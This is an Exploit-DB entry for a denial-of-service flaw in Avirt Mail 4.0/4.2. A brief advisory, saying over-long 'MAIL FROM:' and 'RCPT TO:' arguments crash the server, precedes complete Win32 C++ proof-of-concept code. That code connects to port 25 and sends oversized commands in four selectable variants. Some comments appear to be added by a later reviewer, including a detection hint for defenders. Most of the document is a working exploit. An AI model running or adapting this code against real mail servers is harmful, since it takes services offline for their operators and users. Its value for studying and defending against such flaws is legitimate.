
Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service

🗓️ 23 Oct 2000 00:00:00 · Reported by Martin · Type: exploitdb · 🔗 www.exploit-db.com

Avirt Mail 4.0/4.2 has a denial-of-service vulnerability caused by inadequate input-length checks on the 'MAIL FROM' and 'RCPT TO' fields.

Code
// source: https://www.securityfocus.com/bid/1825/info

Due to insufficient bounds checking in the code that handles the fields 'MAIL FROM:' and 'RCPT TO:', it is possible to remotely crash Avirt Mail.

Entering more than 272 characters in the 'RCPT TO:' field crashes the application when the session terminates, and no further connections can be initiated until Avirt Mail is restarted. The same applies to the 'MAIL FROM:' field, except that more than 556 characters must be entered.

/*
   Small piece of code demonstrating DoS vulnerability in Avirt Mail 4.0-4.2
   [author e-mail address obfuscated by the hosting page]
   Win32 console code
*/
#include <mem.h>
#include <winsock.h>
#include <iostream.h>
#include <stdlib.h>

// Filler lengths sent as the address argument of RCPT TO and MAIL FROM. They
// are the thresholds quoted in the advisory text above (272 and 556
// characters).
// NOTE(review): both values exceed the SMTP size limits (RFC 821 / RFC 5321:
// 256 octets for a path, 512 octets for a whole command line), so a server
// that enforces those limits before copying the argument would refuse these
// commands instead of processing them.
#define RCPT_SIZE 272
#define FROM_SIZE 556

// Pairs a heap-allocated command string with the byte count handed to send().
struct sckssString
{
   char *szBuffer;   // NUL-terminated text; main() fills it with strcpy()
   int nSize;        // strlen() of the text, so the terminator is not counted
};

// SMTP command text used by main(). None of the strings carries a line
// terminator; socksendendline() sends a bare "\n" after each one.
char szHELO[] = "HELO anonymous";
char szMAIL[] = "MAIL FROM: ";   // prefix only; the address argument is sent separately
char szRCPT[] = "RCPT TO: ";     // prefix only; the address argument is sent separately
char szQUIT[] = "QUIT";
char szDATA[] = "DATA\nTest data\n.";   // DATA command, one body line and the closing "." in a single buffer

// Sends the nSize bytes of data->szBuffer on the connected socket and echoes
// the text to the console prefixed with "->".
// A send() failure is fatal: the Winsock error code is printed and the
// process ends with exit(1). Nothing is read back from the peer.
void socksenddata(int socket, sckssString* data)
{
   const int nResult = send(socket,data->szBuffer,data->nSize,NULL);
   if(nResult==SOCKET_ERROR)
   {
      cout << endl << "WSA error (" << WSAGetLastError() << ")" << endl;
      exit(1);
   }

   // Reached only when send() succeeded.
   cout << "->" << data->szBuffer << endl;
}

// Ends the command that was just sent by writing a single "\n" byte to the
// socket (a bare line feed, not the CRLF pair SMTP specifies).
// A send() failure is fatal: the Winsock error code is printed and the
// process ends with exit(1).
void socksendendline(int socket)
{
   const int nResult = send(socket,"\n",1,NULL);
   if(nResult==SOCKET_ERROR)
   {
      cout << endl <<  "WSA error (" << WSAGetLastError() << ")" << endl;
      exit(1);
   }
}

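// Builds a string of num 'A' characters, sends those num bytes on the
// connected socket and echoes the string to the console prefixed with "->".
// A send() failure is fatal: the Winsock error code is printed and the
// process ends with exit(1).
//
// The original placed delete[] after a return/exit pair, so it was never
// reached and the buffer leaked on every call; the buffer is now released on
// both paths.
void socksendanum(int socket, unsigned long int num)
{
   char *tempa = new char[num+1];
   memset(tempa,'A',num);
   tempa[num]=0;   // terminator is only for the console echo; it is not sent

   if(send(socket,tempa,num,NULL)==SOCKET_ERROR)
   {
      // Report the error before freeing, so the error code is still the one
      // set by send().
      cout << endl <<  "WSA error (" << WSAGetLastError() << ")" << endl;
      delete[] tempa;
      exit(1);
   }

   cout << "->" << tempa << endl;
   delete[] tempa;
}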

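// Entry point of the proof of concept: opens one TCP connection to port 25 of
// the address given as the first argument and plays one of four fixed SMTP
// command sequences selected by the second argument.
//
// The parameter names are swapped relative to convention: argv holds the
// argument count and argc the argument vector.
//
// Returns 1 when the socket cannot be created or connected and 0 otherwise.
// The usage path, and any send() failure inside the helpers, end the process
// with exit(1).
//
// Changes from the original listing: the usage text labelled the fourth type
// "2" although the switch handles it as case 4, and the five command buffers
// were never released.
//
// For defenders: each sequence differs from an ordinary mail session only in
// the length of one address argument, so the server-side fix is a length
// check on the MAIL FROM / RCPT TO argument before it is copied, and an
// over-long address argument in SMTP traffic is a usable detection signal.
int main(int argv, char **argc)
{
   if(argv<3)
   {
      cout << "Usage: " << argc[0] << " ip-address type" << endl;
      cout << "Types:" << endl;
      cout << "1 - Overflow in RCPT TO: command.   (aborted session)" << endl;
      cout << "2 - Overflow in MAIL FROM: command. (aborted session)" << endl;
      cout << "3 - Overflow in RCPT TO: command.   (finnished session)" << endl;
      cout << "4 - Overflow in MAIL FROM: command. (finnished session)" << endl;
      exit(1);
   }
   // NOTE(review): the WSAStartup() result is not checked.
   WORD wVersionRequested = MAKEWORD(1,1);
   WSADATA wsaData;
   WSAStartup(wVersionRequested, &wsaData);

   // NOTE(review): the inet_addr() result is used without validation, and
   // only a dotted address is accepted (the usage text says "ip-address").
   SOCKADDR_IN saExploit;
   saExploit.sin_family = PF_INET;
   saExploit.sin_addr.s_addr = inet_addr(argc[1]);
   saExploit.sin_port = htons(25);

   SOCKET sckExploit = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
   if (sckExploit == INVALID_SOCKET)
   {
      cout << "WSA error (" << WSAGetLastError() << ")" << endl;
      WSACleanup();
      return 1;
   }

   if (connect(sckExploit,(LPSOCKADDR)&saExploit,sizeof(saExploit))==SOCKET_ERROR)
   {
      cout << "WSA error (" << WSAGetLastError() << ")" << endl;
      shutdown(sckExploit,2);
      closesocket(sckExploit);
      WSACleanup();
      return 1;
   }

   // Copy each command string into a heap buffer together with its length
   // (terminator excluded), the form socksenddata() expects.
   sckssString sckssHelo;
   sckssHelo.nSize = strlen(szHELO);
   sckssHelo.szBuffer = new char[sckssHelo.nSize+1];
   strcpy(sckssHelo.szBuffer, szHELO);

   sckssString sckssMail;
   sckssMail.nSize = strlen(szMAIL);
   sckssMail.szBuffer = new char[sckssMail.nSize+1];
   strcpy(sckssMail.szBuffer, szMAIL);

   sckssString sckssRcpt;
   sckssRcpt.nSize = strlen(szRCPT);
   sckssRcpt.szBuffer = new char[sckssRcpt.nSize+1];
   strcpy(sckssRcpt.szBuffer, szRCPT);

   sckssString sckssQuit;
   sckssQuit.nSize = strlen(szQUIT);
   sckssQuit.szBuffer = new char[sckssQuit.nSize+1];
   strcpy(sckssQuit.szBuffer, szQUIT);

   sckssString sckssData;
   sckssData.nSize = strlen(szDATA);
   sckssData.szBuffer = new char[sckssData.nSize+1];
   strcpy(sckssData.szBuffer, szDATA);

   cout << "Beginning session..." << endl;

   // Server replies are never read; the commands are written back to back.
   switch(atoi(argc[2]))
   {
      // Type 1: long RCPT TO argument, session ended with QUIT before DATA.
      case 1:
      {
         socksenddata(sckExploit,&sckssHelo);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssMail);
         socksendanum(sckExploit,5);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssRcpt);
         cout << "Overflowing RCPT TO:" << endl;
         socksendanum(sckExploit,RCPT_SIZE);
         socksendendline(sckExploit);

         cout << "Aborting session before data." << endl;
         socksenddata(sckExploit,&sckssQuit);
         socksendendline(sckExploit);
         break;
      }
      // Type 2: long MAIL FROM argument, session ended with QUIT before DATA.
      case 2:
      {
         socksenddata(sckExploit,&sckssHelo);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssMail);
         cout << "Overflowing MAIL FROM:" << endl;
         socksendanum(sckExploit,FROM_SIZE);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssRcpt);
         socksendanum(sckExploit,5);
         socksendendline(sckExploit);

         cout << "Aborting session before data." << endl;
         socksenddata(sckExploit,&sckssQuit);
         socksendendline(sckExploit);
         break;
      }
      // Type 3: as type 1, but the DATA block is sent before QUIT.
      case 3:
      {
         socksenddata(sckExploit,&sckssHelo);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssMail);
         socksendanum(sckExploit,5);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssRcpt);
         cout << "Overflowing RCPT TO:" << endl;
         socksendanum(sckExploit,RCPT_SIZE);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssData);
         socksendendline(sckExploit);

         cout << "Ending session." << endl;
         socksenddata(sckExploit,&sckssQuit);
         socksendendline(sckExploit);
         break;
      }
      // Type 4: as type 2, but the DATA block is sent before QUIT.
      case 4:
      {
         socksenddata(sckExploit,&sckssHelo);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssMail);
         cout << "Overflowing MAIL FROM:" << endl;
         socksendanum(sckExploit,FROM_SIZE);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssRcpt);
         socksendanum(sckExploit,5);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssData);
         socksendendline(sckExploit);

         cout << "Ending session." << endl;
         socksenddata(sckExploit,&sckssQuit);
         socksendendline(sckExploit);
         break;
      }
      default:
      {
         cout << "Type " << argc[2] << " not allowed." << endl;
         break;
      }
   }

   // Release the command buffers allocated above.
   delete[] sckssHelo.szBuffer;
   delete[] sckssMail.szBuffer;
   delete[] sckssRcpt.szBuffer;
   delete[] sckssQuit.szBuffer;
   delete[] sckssData.szBuffer;

   shutdown(sckExploit,2);
   closesocket(sckExploit);
   WSACleanup();
   cout << endl << "Ready!" << endl;
   return 0;
}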


